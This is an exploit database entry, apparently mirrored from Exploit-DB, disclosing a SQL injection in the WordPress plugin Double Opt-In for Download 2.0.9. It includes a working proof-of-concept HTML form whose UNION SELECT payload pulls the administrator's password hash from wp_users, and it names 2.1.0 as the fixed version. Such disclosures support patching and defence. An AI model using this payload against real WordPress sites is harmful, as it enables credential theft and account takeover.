[] NeoSense
E X P L O I T S
title author type platform port cve id

WordPress Plugin Double Opt-In for Download 2.0.9 - SQL Injection

Author: Kacper Szurek
type: webapps
platform: php
port: 80.0
date_added: 2016-06-06 
date_updated: 2016-06-06 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comdouble-opt-in-for-download.2.0.9.zip
# Exploit Title: Double Opt-In for Download 2.0.9 Sql Injection
# Date: 06-06-2016
# Software Link: https://wordpress.org/plugins/double-opt-in-for-download/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description

`$_POST['id']` is not escaped.

`populate_download_edit_form()` is accessible for every registered user.

http://security.szurek.pl/double-opt-in-for-download-209-sql-injection.html


2. Proof of Concept

Login as regular user.

<form name="xss" action="http://wordpress-url/wp-admin/admin-ajax.php?action=populate_download_edit_form" method="post">
	<input type="text" name="id" value="0 UNION SELECT 1, 2, 4, 5, 6, 7, user_pass FROM wp_users WHERE ID=1">
	<input type="submit" value="Send">
</form>

3. Solution:

Update to version 2.1.0
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.